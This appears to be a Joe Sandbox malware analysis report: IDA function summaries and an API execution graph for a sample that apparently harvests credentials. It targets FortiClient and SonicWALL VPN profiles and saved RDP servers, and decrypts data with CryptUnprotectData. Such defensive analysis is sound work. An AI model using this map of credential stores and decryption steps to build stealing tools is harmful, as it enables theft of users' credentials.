                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AppendPathlstrcpy
                                                                                                        • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                        • API String ID: 3043196718-4231764533
                                                                                                        • Opcode ID: 8f58ea5ad3b518f49ceb7b46cbd7adf588816f50efc6b121aa6a33ae32cd25e4
                                                                                                        • Instruction ID: 8f08afd6ce1914e99465b233d369551185649462ece1dc1f13932e550d950e12
                                                                                                        • Opcode Fuzzy Hash: 8f58ea5ad3b518f49ceb7b46cbd7adf588816f50efc6b121aa6a33ae32cd25e4
                                                                                                        • Instruction Fuzzy Hash: 6A31B172A18A81A5EA60EF61E4041E9A365FB8EBD0F844132EF5D07799CE7CE504D710
                                                                                                        Function 00007FF7327A1DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: ?
                                                                                                        • API String ID: 1818849710-1684325040
                                                                                                        • Opcode ID: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                        • Instruction ID: f1c38058cba22c6b223779eb70aba6fdfdd2fc49804ff7ede0087b1ed22006e7
                                                                                                        • Opcode Fuzzy Hash: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                        • Instruction Fuzzy Hash: 5521C473A187809AE7209F75A8402EDBBA0FB5D7A8B944225EB8D03B59DF7CD144DB10
                                                                                                        Function 00007FF7327AE604 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                                        • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                                        • API String ID: 784796242-1893226844
                                                                                                        • Opcode ID: cb7a6499aa34e5c2d2a12428343009169a242363acc74ead088cd1ca5e2489a2
                                                                                                        • Instruction ID: 9d84ae9a93bd8027b7a39ac97e680e3b814b634f5994889407e6b0ef57614a88
                                                                                                        • Opcode Fuzzy Hash: cb7a6499aa34e5c2d2a12428343009169a242363acc74ead088cd1ca5e2489a2
                                                                                                        • Instruction Fuzzy Hash: 8C116012A08682A0E960FB51E8552FAE351FF8EBD0FC45131EB5E477AADEACF104D750
                                                                                                        Function 00007FF7327ACBF4 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Enum$CloseOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1701607978-0
                                                                                                        • Opcode ID: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                        • Instruction ID: 7088c77838419d1c8a80789f1de5bf4e6231b11464886ef515f9466b212e123f
                                                                                                        • Opcode Fuzzy Hash: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                        • Instruction Fuzzy Hash: 49218933618B8992D3108F11E4807AAB7B8F788B84F540236EB8D43B28CF7DE559CB00
                                                                                                        Function 00007FF7327AE4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$AppendPathlstrcpy
                                                                                                        • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                                                        • API String ID: 19203174-1233151749
                                                                                                        • Opcode ID: 5ebd68a201dc03246a0378e0b7619f1cb579af44d90274066901a23859bd5563
                                                                                                        • Instruction ID: 4ae058ff155d917f5c3b2da497787f6b247454a1280649d98fca5bb6b570f038
                                                                                                        • Opcode Fuzzy Hash: 5ebd68a201dc03246a0378e0b7619f1cb579af44d90274066901a23859bd5563
                                                                                                        • Instruction Fuzzy Hash: 5E21B171618A82A5DAA0FF61D8142EEA351FB8EBD0F844131EB4D4B799DE7CE604D710
                                                                                                        Function 00007FF7327AFDE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetEnvironmentVariableW.KERNEL32 ref: 00007FF7327AFE11
                                                                                                        • lstrcatW.KERNEL32 ref: 00007FF7327AFE1E
                                                                                                          • Part of subcall function 00007FF7327AFF3C: lstrlenW.KERNEL32 ref: 00007FF7327AFF62
                                                                                                          • Part of subcall function 00007FF7327AFF3C: lstrlenW.KERNEL32 ref: 00007FF7327AFF7E
                                                                                                          • Part of subcall function 00007FF7327AFF3C: WideCharToMultiByte.KERNEL32 ref: 00007FF7327AFFA7
                                                                                                          • Part of subcall function 00007FF7327AFF3C: PathFileExistsA.SHLWAPI ref: 00007FF7327AFFB0
                                                                                                          • Part of subcall function 00007FF7327AFF3C: OpenFile.KERNEL32 ref: 00007FF7327AFFC9
                                                                                                          • Part of subcall function 00007FF7327AFF3C: GetFileSize.KERNEL32 ref: 00007FF7327AFFE9
                                                                                                          • Part of subcall function 00007FF7327AFF3C: CreateFileMappingA.KERNEL32 ref: 00007FF7327B0020
                                                                                                          • Part of subcall function 00007FF7327AFF3C: MapViewOfFile.KERNEL32 ref: 00007FF7327B0041
                                                                                                          • Part of subcall function 00007FF7327AFF3C: __memcpy.DELAYIMP ref: 00007FF7327B0053
                                                                                                          • Part of subcall function 00007FF7327AFF3C: UnmapViewOfFile.KERNEL32 ref: 00007FF7327B005E
                                                                                                          • Part of subcall function 00007FF7327AFF3C: CloseHandle.KERNEL32 ref: 00007FF7327B0067
                                                                                                          • Part of subcall function 00007FF7327AFF3C: CloseHandle.KERNEL32 ref: 00007FF7327B0070
                                                                                                          • Part of subcall function 00007FF7327AF280: __memcpy.DELAYIMP ref: 00007FF7327AF29E
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                                                        • String ID: APPDATA
                                                                                                        • API String ID: 2395011915-4054820676
                                                                                                        • Opcode ID: 51cede005e5ac96b491f91fff2636ad4a4e1208d626e6509ebede37ba1166343
                                                                                                        • Instruction ID: 29dc9c05b3854f2a6d1bf41bd3edcb2ca513223632ed62a118cbdac3a72f3984
                                                                                                        • Opcode Fuzzy Hash: 51cede005e5ac96b491f91fff2636ad4a4e1208d626e6509ebede37ba1166343
                                                                                                        • Instruction Fuzzy Hash: 53118E22728A82A1EB50EB10E4405EEB360FF99794FC04031EB8D87A59EFBDE509C750

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.8%
                                                                                                        Dynamic/Decrypted Code Coverage:50.5%
                                                                                                        Signature Coverage:3.2%
                                                                                                        Total number of Nodes:784
                                                                                                        Total number of Limit Nodes:75
                                                                                                        execution_graph 27720 3116b14 memset memcpy _allmul 26882 30f4108 26885 30f4045 26882->26885 26904 30f3fdc 26885->26904 26888 30f3fdc 50 API calls 26889 30f407a 26888->26889 26890 30f3fdc 50 API calls 26889->26890 26891 30f408d 26890->26891 26892 30f3fdc 50 API calls 26891->26892 26893 30f40a0 26892->26893 26894 30f3fdc 50 API calls 26893->26894 26895 30f40b3 26894->26895 26896 30f3fdc 50 API calls 26895->26896 26897 30f40c6 26896->26897 26898 30f3fdc 50 API calls 26897->26898 26899 30f40d9 26898->26899 26900 30f3fdc 50 API calls 26899->26900 26901 30f40ec 26900->26901 26902 30f3fdc 50 API calls 26901->26902 26903 30f40ff 26902->26903 26915 30f1afe 26904->26915 26907 30f403f 26907->26888 26912 30f4038 26978 30f1011 26912->26978 26983 30f1000 GetProcessHeap RtlAllocateHeap 26915->26983 26917 30f1b0d SHGetFolderPathW 26918 30f1b20 26917->26918 26921 30f1b63 26917->26921 26919 30f1011 3 API calls 26918->26919 26922 30f1b28 26919->26922 26921->26907 26923 30f199d 26921->26923 26922->26921 26984 30f19e5 26922->26984 26999 30f1953 26923->26999 26925 30f19a6 26926 30f1011 3 API calls 26925->26926 26927 30f19af 26926->26927 26928 30f3ed9 26927->26928 26929 30f3eed 26928->26929 26930 30f3fd1 26928->26930 26929->26930 27005 30f1000 GetProcessHeap RtlAllocateHeap 26929->27005 26930->26912 26950 30f1d4a 26930->26950 26932 30f3f01 PathCombineW FindFirstFileW 26933 30f3fca 26932->26933 26938 30f3f27 26932->26938 26936 30f1011 3 API calls 26933->26936 26934 30f3f78 lstrcmpiW 26937 30f3faf FindNextFileW 26934->26937 26934->26938 26935 30f3f32 lstrcmpiW 26935->26937 26939 30f3f42 lstrcmpiW 26935->26939 26936->26930 26937->26938 26941 30f3fc3 FindClose 26937->26941 26938->26934 26938->26935 27006 30f1000 GetProcessHeap RtlAllocateHeap 26938->27006 26939->26937 26942 30f3f56 26939->26942 26941->26933 27023 30f1000 GetProcessHeap RtlAllocateHeap 26942->27023 26943 30f3f92 PathCombineW 27007 30f3e04 26943->27007 26946 30f3f60 PathCombineW 26948 30f3ed9 23 API calls 26946->26948 26947 30f3f76 26949 30f1011 3 API calls 26947->26949 26948->26947 26949->26937 26951 30f1eb4 26950->26951 26952 30f1d62 26950->26952 26951->26912 26952->26951 27055 30f19b4 26952->27055 26955 30f1d8b 26958 30f1953 6 API calls 26955->26958 26956 30f1d79 26957 30f1953 6 API calls 26956->26957 26959 30f1d83 26957->26959 26958->26959 26959->26951 26960 30f1da3 FindFirstFileW 26959->26960 26961 30f1ead 26960->26961 26968 30f1dba 26960->26968 26962 30f1011 3 API calls 26961->26962 26962->26951 26963 30f1dc5 lstrcmpiW 26965 30f1e8e FindNextFileW 26963->26965 26966 30f1ddd lstrcmpiW 26963->26966 26964 30f1953 6 API calls 26964->26968 26967 30f1ea2 FindClose 26965->26967 26965->26968 26966->26965 26975 30f1df5 26966->26975 26967->26961 26968->26963 26968->26964 26969 30f199d 9 API calls 26968->26969 26971 30f1e54 lstrcmpiW 26969->26971 26970 30f19b4 lstrlenW 26970->26975 26971->26975 26972 30f1011 3 API calls 26972->26965 26974 30f1953 6 API calls 26974->26975 26975->26970 26975->26972 26975->26974 26976 30f199d 9 API calls 26975->26976 26977 30f1d4a 12 API calls 26975->26977 27059 30f1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 26975->27059 26976->26975 26977->26975 27060 30f1162 VirtualQuery 26978->27060 26981 30f102d 26981->26907 26982 30f101d GetProcessHeap RtlFreeHeap 26982->26981 26983->26917 26985 30f19fa RegOpenKeyExW 26984->26985 26986 30f19f7 26984->26986 26987 30f1a28 RegQueryValueExW 26985->26987 26988 30f1aa2 26985->26988 26986->26985 26990 30f1a46 26987->26990 26991 30f1a94 RegCloseKey 26987->26991 26989 30f1ab9 26988->26989 26992 30f19e5 5 API calls 26988->26992 26989->26922 26990->26991 26998 30f1000 GetProcessHeap RtlAllocateHeap 26990->26998 26991->26988 26991->26989 26992->26989 26994 30f1a61 RegQueryValueExW 26995 30f1a7f 26994->26995 26996 30f1a8b 26994->26996 26995->26991 26997 30f1011 3 API calls 26996->26997 26997->26995 26998->26994 27000 30f1964 lstrlenW lstrlenW 26999->27000 27004 30f1000 GetProcessHeap RtlAllocateHeap 27000->27004 27003 30f1986 lstrcatW lstrcatW 27003->26925 27004->27003 27005->26932 27006->26943 27024 30f1b6a 27007->27024 27009 30f3e0f 27010 30f3ec7 27009->27010 27030 30f1c31 CreateFileW 27009->27030 27010->26947 27017 30f3ebf 27018 30f1011 3 API calls 27017->27018 27018->27010 27019 30f3e6c RtlCompareMemory 27020 30f3ea8 27019->27020 27021 30f3e7e CryptUnprotectData 27019->27021 27022 30f1011 3 API calls 27020->27022 27021->27020 27022->27017 27023->26946 27025 30f1b6f 27024->27025 27026 30f1b99 27024->27026 27025->27026 27027 30f1b76 CreateFileW 27025->27027 27026->27009 27028 30f1b8d CloseHandle 27027->27028 27029 30f1b95 27027->27029 27028->27029 27029->27009 27031 30f1c98 27030->27031 27032 30f1c53 GetFileSize 27030->27032 27031->27010 27040 30f2fb1 27031->27040 27033 30f1c63 27032->27033 27034 30f1c90 CloseHandle 27032->27034 27052 30f1000 GetProcessHeap RtlAllocateHeap 27033->27052 27034->27031 27036 30f1c6b ReadFile 27037 30f1c80 27036->27037 27037->27034 27038 30f1011 3 API calls 27037->27038 27039 30f1c8e 27038->27039 27039->27034 27041 30f2fb8 StrStrIA 27040->27041 27042 30f2ff2 27040->27042 27041->27042 27043 30f2fcd lstrlen StrStrIA 27041->27043 27042->27010 27046 30f123b lstrlen 27042->27046 27043->27042 27044 30f2fe7 27043->27044 27053 30f190b 6 API calls 27044->27053 27047 30f129b 27046->27047 27048 30f1256 CryptStringToBinaryA 27046->27048 27047->27017 27047->27019 27047->27020 27048->27047 27049 30f1272 27048->27049 27054 30f1000 GetProcessHeap RtlAllocateHeap 27049->27054 27051 30f127e CryptStringToBinaryA 27051->27047 27052->27036 27053->27042 27054->27051 27056 30f19bc 27055->27056 27058 30f19d4 27055->27058 27057 30f19c3 lstrlenW 27056->27057 27056->27058 27057->27058 27058->26955 27058->26956 27059->26975 27061 30f1019 27060->27061 27061->26981 27061->26982 27826 31084a7 30 API calls 27205 3159304 27206 3159344 27205->27206 27207 31594da LoadLibraryA 27206->27207 27210 315951f VirtualProtect VirtualProtect 27206->27210 27211 3159584 27206->27211 27208 31594f1 27207->27208 27208->27206 27212 3159503 GetProcAddress 27208->27212 27210->27211 27211->27211 27212->27208 27213 3159519 27212->27213 27827 3106d01 _allmul 27425 30f411b 27426 30f4045 50 API calls 27425->27426 27427 30f412b 27426->27427 27428 30f4045 50 API calls 27427->27428 27429 30f413b 27428->27429 27725 3126f06 24 API calls 27478 30f3717 27479 30f1b6a 2 API calls 27478->27479 27481 30f372e 27479->27481 27480 30f3c23 27481->27480 27528 30f1000 GetProcessHeap RtlAllocateHeap 27481->27528 27483 30f376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27484 30f379e 27483->27484 27485 30f37a8 27483->27485 27529 30f349b 31 API calls 27484->27529 27486 3144bec 89 API calls 27485->27486 27490 30f37b3 27486->27490 27488 30f3c15 DeleteFileW 27489 30f1011 3 API calls 27488->27489 27489->27480 27490->27488 27491 30f3c0c 27490->27491 27530 30f1000 GetProcessHeap RtlAllocateHeap 27490->27530 27492 3143848 76 API calls 27491->27492 27492->27488 27494 30f37e3 27531 31102ec 94 API calls 27494->27531 27497 30f3bd9 lstrlen 27498 30f3c05 27497->27498 27499 30f3be5 27497->27499 27500 30f1011 3 API calls 27498->27500 27537 30f1798 lstrlen 27499->27537 27500->27491 27503 30f3bf3 27538 30f1798 lstrlen 27503->27538 27504 30f3a37 CryptUnprotectData 27522 30f37ee 27504->27522 27505 30f3833 RtlCompareMemory 27505->27504 27505->27522 27507 30f3bcc 27536 310fb92 93 API calls 27507->27536 27508 30f3bfc 27539 30f1798 lstrlen 27508->27539 27510 30f3867 RtlZeroMemory 27532 30f1000 GetProcessHeap RtlAllocateHeap 27510->27532 27512 30f1fa7 19 API calls 27512->27522 27513 30f1011 3 API calls 27513->27522 27514 30f3b0f lstrlen 27515 30f3b21 lstrlen 27514->27515 27514->27522 27515->27522 27516 30f1000 GetProcessHeap RtlAllocateHeap 27516->27522 27517 30f3987 lstrlen 27520 30f3999 lstrlen 27517->27520 27517->27522 27519 30f3b66 wsprintfA lstrlen 27521 30f3ba3 lstrcat 27519->27521 27519->27522 27520->27522 27521->27522 27522->27504 27522->27505 27522->27507 27522->27510 27522->27512 27522->27513 27522->27514 27522->27516 27522->27517 27522->27521 27533 30f2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27522->27533 27534 30f2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27522->27534 27535 31102ec 94 API calls 27522->27535 27524 30f39de wsprintfA lstrlen 27525 30f3a0d 27524->27525 27526 30f3a1b lstrcat 27524->27526 27525->27526 27527 30f1011 3 API calls 27526->27527 27527->27522 27528->27483 27529->27485 27530->27494 27531->27522 27532->27522 27533->27524 27534->27519 27535->27522 27536->27497 27537->27503 27538->27508 27539->27498 27726 3115f08 102 API calls 27540 30f2b15 27541 30f1953 6 API calls 27540->27541 27542 30f2b1f FindFirstFileW 27541->27542 27544 30f2c5c 27542->27544 27563 30f2b4e 27542->27563 27545 30f1011 3 API calls 27544->27545 27547 30f2c63 27545->27547 27546 30f2b59 lstrcmpiW 27549 30f2c3d FindNextFileW 27546->27549 27550 30f2b71 lstrcmpiW 27546->27550 27551 30f1011 3 API calls 27547->27551 27548 30f1953 6 API calls 27548->27563 27552 30f2c51 FindClose 27549->27552 27549->27563 27550->27549 27550->27563 27553 30f2c6a 27551->27553 27552->27544 27554 30f199d 9 API calls 27556 30f2bdf StrStrIW 27554->27556 27555 30f19b4 lstrlenW 27555->27563 27557 30f2c10 StrStrIW 27556->27557 27560 30f2bf1 27556->27560 27557->27560 27558 30f1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27558->27560 27559 30f1011 3 API calls 27559->27549 27560->27557 27560->27558 27560->27559 27565 30f278e 41 API calls 27560->27565 27562 30f199d 9 API calls 27562->27563 27563->27546 27563->27548 27563->27554 27563->27555 27563->27562 27564 30f1011 3 API calls 27563->27564 27564->27563 27565->27557 27830 311f130 22 API calls 27727 310ff32 21 API calls 27832 3109534 39 API calls 27728 30fcb2a _allmul _allmul 27834 30f9925 18 API calls 27732 3107b3d 18 API calls 27735 3100f3e 60 API calls 27601 30f413e 27602 30f4045 50 API calls 27601->27602 27603 30f414e 27602->27603 27736 313c322 27 API calls 27835 3100128 36 API calls 27737 312072d 19 API calls 27837 311e558 22 API calls 27838 311e141 18 API calls 27741 3116340 92 API calls 27840 30fa558 18 API calls 27742 310f74d 18 API calls 27743 30fab68 22 API calls 27842 310c97b memcpy 27746 3127762 memset memset memcpy 27747 3117f67 24 API calls 27661 30f2f77 27662 30f2e30 22 API calls 27661->27662 27663 30f2f9a 27662->27663 27664 30f2e30 22 API calls 27663->27664 27665 30f2fab 27664->27665 27845 3125d6f 20 API calls 27846 310a16f 33 API calls 27748 310cb91 18 API calls 27749 31113ca 88 API calls 27847 310fd97 19 API calls 27214 30f639e 27218 30fb1e5 27214->27218 27238 30fb1e3 27214->27238 27215 30f63b2 27219 30fb20d 27218->27219 27220 30fb214 27218->27220 27274 30faeea 27219->27274 27222 30fb233 27220->27222 27225 30fb28f 27220->27225 27292 30fae65 27220->27292 27222->27225 27258 30fa7ae 27222->27258 27225->27215 27227 30fb2d6 27271 30f6a5a 27227->27271 27229 30fb26d 27298 30fa1c6 18 API calls 27229->27298 27230 30fb2e8 27230->27225 27234 30fb310 CreateFileMappingW 27230->27234 27235 30fb37e 27234->27235 27236 30fb32b MapViewOfFile 27234->27236 27299 30fa1c6 18 API calls 27235->27299 27236->27230 27236->27235 27239 30fb1e5 27238->27239 27240 30fb214 27239->27240 27241 30faeea 27 API calls 27239->27241 27242 30fb233 27240->27242 27243 30fae65 22 API calls 27240->27243 27245 30fb28f 27240->27245 27241->27240 27244 30fa7ae 18 API calls 27242->27244 27242->27245 27243->27242 27249 30fb267 27244->27249 27245->27215 27246 30fb26d 27372 30fa1c6 18 API calls 27246->27372 27247 30fb2d6 27248 30f6a5a 17 API calls 27247->27248 27250 30fb2e8 27248->27250 27249->27245 27249->27246 27249->27247 27252 30fa67c 22 API calls 27249->27252 27250->27245 27254 30fb310 CreateFileMappingW 27250->27254 27253 30fb2be 27252->27253 27253->27246 27253->27247 27255 30fb37e 27254->27255 27256 30fb32b MapViewOfFile 27254->27256 27373 30fa1c6 18 API calls 27255->27373 27256->27250 27256->27255 27259 30fa7c7 27258->27259 27261 30fa805 27259->27261 27300 30fa1c6 18 API calls 27259->27300 27261->27225 27261->27227 27261->27229 27262 30fa67c 27261->27262 27263 30fa694 _alldiv _allmul 27262->27263 27264 30fa6c1 27262->27264 27263->27264 27301 30fa33b SetFilePointer 27264->27301 27267 30fa6f0 SetEndOfFile 27268 30fa6ee 27267->27268 27269 30fa6d4 27267->27269 27268->27227 27268->27229 27269->27268 27305 30fa1c6 18 API calls 27269->27305 27272 314307c 17 API calls 27271->27272 27273 30f6a65 27272->27273 27273->27230 27307 30f6a81 27274->27307 27276 30faf01 27277 30f6a81 memset 27276->27277 27291 30faf07 27276->27291 27278 30faf2a 27277->27278 27278->27291 27311 30f7f07 27278->27311 27281 30faf54 27281->27291 27314 31452ae 27281->27314 27284 30faffa 27285 30fb020 27284->27285 27286 30fb000 27284->27286 27287 30fae65 22 API calls 27285->27287 27338 30fa1c6 18 API calls 27286->27338 27289 30fb01c 27287->27289 27289->27291 27333 30fadcc 27289->27333 27291->27220 27293 30fae7a 27292->27293 27294 30fa67c 22 API calls 27293->27294 27295 30fae83 27293->27295 27296 30faea5 27294->27296 27295->27222 27296->27295 27371 30fa1c6 18 API calls 27296->27371 27298->27225 27299->27225 27300->27261 27302 30fa36a 27301->27302 27303 30fa390 27301->27303 27302->27303 27306 30fa1c6 18 API calls 27302->27306 27303->27267 27303->27269 27305->27268 27306->27303 27308 30f6a8f 27307->27308 27309 30f6a95 memset 27308->27309 27310 30f6aa4 27308->27310 27309->27310 27310->27276 27339 30f7ec7 27311->27339 27315 31452bb 27314->27315 27316 30fafd9 27315->27316 27344 312ba08 _allmul 27315->27344 27318 30fb87b 27316->27318 27319 30fb88d memset 27318->27319 27328 30fb8e5 27319->27328 27322 30fba3c 27322->27284 27323 30fb965 CreateFileW 27323->27328 27326 30fba14 27351 30fa1c6 18 API calls 27326->27351 27327 30fba41 27332 31452ae _allmul 27327->27332 27328->27319 27328->27322 27328->27323 27328->27326 27328->27327 27345 30fb609 27328->27345 27348 30fb64b 18 API calls 27328->27348 27349 30fbb9f 18 API calls 27328->27349 27350 30fa2aa 17 API calls 27328->27350 27330 30fba32 27352 3144db2 17 API calls 27330->27352 27332->27322 27337 30fade4 27333->27337 27334 30fae5f 27334->27291 27337->27334 27357 30fbafc 27337->27357 27368 30fa39e 18 API calls 27337->27368 27338->27289 27340 30f7ed9 27339->27340 27342 30f7ed4 27339->27342 27343 30f6e6a 17 API calls 27340->27343 27342->27281 27343->27342 27344->27316 27353 30fa08a 27345->27353 27347 30fb60f 27347->27328 27348->27328 27349->27328 27350->27328 27351->27330 27352->27322 27354 30fa0a4 27353->27354 27355 30f6a81 memset 27354->27355 27356 30fa0aa 27354->27356 27355->27356 27356->27347 27358 30fb609 memset 27357->27358 27359 30fbb14 27358->27359 27360 30fbb3f GetFileAttributesW 27359->27360 27361 30fbb25 DeleteFileW 27359->27361 27363 30fbb5b 27359->27363 27367 30fbb1a 27359->27367 27360->27359 27362 30fbb4b 27360->27362 27361->27359 27364 30fbb7d 27361->27364 27362->27363 27362->27364 27369 30fa1c6 18 API calls 27363->27369 27370 30fa2aa 17 API calls 27364->27370 27367->27337 27368->27337 27369->27367 27370->27367 27371->27295 27372->27245 27373->27245 27374 30f1b9d 27375 30f1ba2 27374->27375 27376 30f1bc1 27374->27376 27375->27376 27377 30f1ba9 GetFileAttributesW 27375->27377 27378 30f1bb5 27377->27378 27752 30fbf9a _alldiv 27848 30f1198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 27849 3117d8b _allrem memcpy 27754 310ab8b 19 API calls 27756 31333b7 27 API calls 27757 31113ca 89 API calls 27852 3119dbc 25 API calls 27853 31011a0 43 API calls 27758 3118ba6 7 API calls 27759 31353ad memset memcpy memset memcpy 26875 30f9fc8 26876 30f9fd8 26875->26876 26879 30f9fd3 26875->26879 26877 30f9ff4 HeapCreate 26876->26877 26876->26879 26878 30fa004 26877->26878 26877->26879 26881 30f7f70 17 API calls 26878->26881 26881->26879 27379 30f63dd 27381 30fb87b 21 API calls 27379->27381 27380 30f63f4 27381->27380 27382 30f15dd 27383 30f15f3 lstrlen 27382->27383 27384 30f1600 27382->27384 27383->27384 27393 30f1000 GetProcessHeap RtlAllocateHeap 27384->27393 27386 30f1608 lstrcat 27387 30f163d lstrcat 27386->27387 27388 30f1644 27386->27388 27387->27388 27394 30f1333 27388->27394 27391 30f1011 3 API calls 27392 30f1667 27391->27392 27393->27386 27417 30f1000 GetProcessHeap RtlAllocateHeap 27394->27417 27396 30f1357 27418 30f106c lstrlen MultiByteToWideChar 27396->27418 27398 30f1366 27419 30f12a3 RtlZeroMemory 27398->27419 27401 30f13b8 RtlZeroMemory 27405 30f13ed 27401->27405 27402 30f1011 3 API calls 27403 30f15d2 27402->27403 27403->27391 27404 30f15b5 27404->27402 27405->27404 27421 30f1000 GetProcessHeap RtlAllocateHeap 27405->27421 27407 30f14a7 wsprintfW 27409 30f14c9 27407->27409 27408 30f15a1 27410 30f1011 3 API calls 27408->27410 27409->27408 27422 30f1000 GetProcessHeap RtlAllocateHeap 27409->27422 27410->27404 27412 30f159a 27415 30f1011 3 API calls 27412->27415 27413 30f1533 27413->27412 27423 30f104c VirtualAlloc 27413->27423 27415->27408 27416 30f158a RtlMoveMemory 27416->27412 27417->27396 27418->27398 27420 30f12c5 27419->27420 27420->27401 27420->27404 27421->27407 27422->27413 27423->27416 27430 